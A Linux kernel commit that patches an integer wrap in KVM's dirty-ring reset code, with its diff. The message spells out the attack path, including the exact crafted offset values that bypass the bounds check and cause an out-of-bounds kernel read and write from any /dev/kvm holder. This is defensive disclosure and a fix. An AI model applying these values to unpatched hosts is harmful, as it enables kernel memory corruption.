Dev news

Commit 577a8d3bae05 for kernel

commit 577a8d3bae0531f0e5ccfac919cd8192f920a804
Author: Aaron Sacks <contact@xchglabs.com>
Date:   Tue May 12 02:07:42 2026 -0400

    KVM: Reject wrapped offset in kvm_reset_dirty_gfn()

    kvm_reset_dirty_gfn() guards the gfn range with

            if (!memslot || (offset + __fls(mask)) >= memslot->npages)
                    return;

    but offset is u64 and the addition is unchecked.  The check can be
    silently bypassed by a u64 wrap.

    The dirty ring backing those entries is MAP_SHARED at
    KVM_DIRTY_LOG_PAGE_OFFSET of the vcpu fd, so the VMM can rewrite the
    slot and offset fields of any entry between when the kernel pushes
    them and when KVM_RESET_DIRTY_RINGS consumes them.  On reset,
    kvm_dirty_ring_reset() re-reads the values via READ_ONCE() and feeds
    them straight back into this check; only the flags handshake is
    treated as the handover, the slot/offset payload is taken on trust.

    Crafting two entries

            entry[i].offset   = 0xffffffffffffffc1
            entry[i+1].offset = 0

    makes the coalescing loop in kvm_dirty_ring_reset() compute

            delta = (s64)(0 - 0xffffffffffffffc1) = 63

    which falls in [0, BITS_PER_LONG), so it folds entry[i+1] into the
    existing mask by setting bit 63.  The trailing kvm_reset_dirty_gfn()
    call then sees offset = 0xffffffffffffffc1 and __fls(mask) = 63;
    the sum is 0 in u64 and the bounds check passes.

    That offset propagates into kvm_arch_mmu_enable_log_dirty_pt_masked()
    unchanged.  On the legacy MMU path -- kvm_memslots_have_rmaps() ==
    true, i.e. shadow paging, any VM that has allocated shadow roots, or
    a write-tracked slot -- it reaches gfn_to_rmap(), which indexes
    slot->arch.rmap[0][] with a near-U64_MAX gfn.  That is an
    out-of-bounds load of a kvm_rmap_head, followed by a conditional
    clear of PT_WRITABLE_MASK in whatever the loaded pointer points at.
    The path is reachable from any process holding /dev/kvm.

    Range-check offset on its own first, so the addition cannot wrap.
    memslot->npages is bounded well below U64_MAX, so once offset <
    npages holds, offset + __fls(mask) (with __fls(mask) < BITS_PER_LONG)
    stays in range.

    Fixes: fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
    Cc: stable@vger.kernel.org
    Signed-off-by: Aaron Sacks <contact@xchglabs.com>
    Link: https://patch.msgid.link/20260512060742.1628959-1-contact@xchglabs.com/
    Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>

diff --git a/virt/kvm/dirty_ring.c b/virt/kvm/dirty_ring.c
index 02bc6b00d76c..572b854edf74 100644
--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(struct kvm *kvm, u32 slot, u64 offset, u64 mask)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);